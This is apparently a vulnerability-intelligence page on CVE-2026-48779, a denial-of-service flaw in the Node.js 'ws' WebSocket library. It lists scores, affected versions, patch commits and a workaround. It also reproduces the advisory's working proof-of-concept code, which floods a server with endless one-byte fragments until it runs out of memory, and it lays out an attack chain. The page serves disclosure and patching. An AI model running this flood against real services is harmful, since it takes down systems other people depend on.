What is the CVSS score of CVE-2026-48779?

CVE-2026-48779 has a CVSS 3.1 base score of 7.5 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. EPSS exploitation probability: 0.6%.

Which versions of ws (Node.js WebSocket) are affected by CVE-2026-48779?

The npm 'ws' WebSocket library contains a remotely exploitable memory exhaustion vulnerability affecting Node.js applications across versions prior to 5.2.5, 6.2.4, 7.5.11, and 8.21.0.. A patch is available.

Is there a public PoC exploit available for CVE-2026-48779?

Yes, a public proof-of-concept exploit is available for CVE-2026-48779. Prioritise patching immediately. EPSS: 0.6%.

How to fix or mitigate CVE-2026-48779?

Within 24 hours: Identify all Node.js applications using the ws library and document current deployed versions. Within 7 days: Upgrade ws to patched versions (5.2.5 for v5.x, 6.2.4 for v6.x, 7.5.11 for v7.x, or 8.21.0 for v8.x). Within 30 days: Complete full regression testing and validate production stability post-upgrade.

ws (Node.js WebSocket) CVE-2026-48779

HIGH

Uncontrolled Resource Consumption (CWE-400)

2026-06-15 https://github.com/websockets/ws

GHSA-96hv-2xvq-fx4p

Denial Of Service

7.5

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

7.5 HIGH

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

vuln.today AI

7.5 HIGH

Remote, unauthenticated peer over a standard WebSocket connection with no user interaction; impact is availability-only (process OOM), no confidentiality or integrity effect.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

Confidentiality

None

Integrity

None

Availability

High

Lifecycle Timeline

Source Code Evidence Fetched

Jun 15, 2026 - 17:15 vuln.today

Analysis Generated

Jun 15, 2026 - 17:15 vuln.today

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

320 npm packages depend on ws (27 direct, 295 indirect)

Ecosystem-wide dependent count for version 1.1.0.

DescriptionGitHub Advisory

Impact

A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.

Proof of concept

import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});

Patches

The vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws@5.2.5 (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

AnalysisAI

Memory exhaustion denial of service in the npm 'ws' WebSocket library allows a remote unauthenticated peer to crash a Node.js process by streaming many tiny WebSocket fragments that force the receiver to allocate structural wrappers far exceeding the documented maxPayload limit, ultimately triggering an out-of-memory termination. The flaw affects ws versions prior to 5.2.5, 6.2.4, 7.5.11, and 8.21.0, and publicly available exploit code exists in the GitHub Security Advisory GHSA-96hv-2xvq-fx4p.

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon

Identify Node.js service using ws

Delivery

Open WebSocket connection

Exploit

Send stream of 1-byte fin:false fragments

Install

Server allocates structural wrappers per fragment

V8 heap exhausted past maxPayload guard

Execute

Node process OOM-killed

Impact

Service availability lost

Recon

Identify Node.js service using ws

Delivery

Open WebSocket connection

Exploit

Send stream of 1-byte fin:false fragments

Install

Server allocates structural wrappers per fragment

V8 heap exhausted past maxPayload guard

Execute

Node process OOM-killed

Impact

Service availability lost

Vulnerability AssessmentAI

Exploitation	Exploitation requires only that the target expose a 'ws'-based WebSocket endpoint reachable from the attacker over TCP, with default or any maxPayload configuration that does not also cap fragment count or per-connection heap growth - the flaw is independent of message-byte limits because the structural wrappers, not the payload bytes, drive memory growth. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H accurately reflects a network-reachable, unauthenticated, low-complexity availability attack with no impact on confidentiality or integrity - a textbook DoS. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker opens a single WebSocket connection to a vulnerable Node.js service and, using the publicly available PoC from GHSA-96hv-2xvq-fx4p, transmits an unbounded stream of 1-byte fragments with fin:false. The server allocates a structural wrapper per fragment, the V8 heap grows past its limit, and the Node process is killed by the OOM killer or its own heap-size guard, taking down all other tenants of that process.
Remediation	Vendor-released patch: upgrade to ws 8.21.0 on the 8.x line, or apply the backports ws 7.5.11, 6.2.4, or 5.2.5 depending on the branch in use (commits bca91ad, fd36cd8, 86d3e8a, and b5372ac respectively, all referenced from https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all Node.js applications using the ws library and document current deployed versions. …

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-48779 vulnerability details – vuln.today

Back

ws (Node.js WebSocket) CVE-2026-48779

Severity by source

CVSS VectorGitHub Advisory

Lifecycle Timeline

Blast Radius

DescriptionGitHub Advisory

Impact

Proof of concept

Patches

Workarounds

Credits

AnalysisAI

Unlock full vulnerability intelligence

Attack ChainAIDerived

Vulnerability AssessmentAI

Recommended ActionAI

Share

External POC / Exploit Code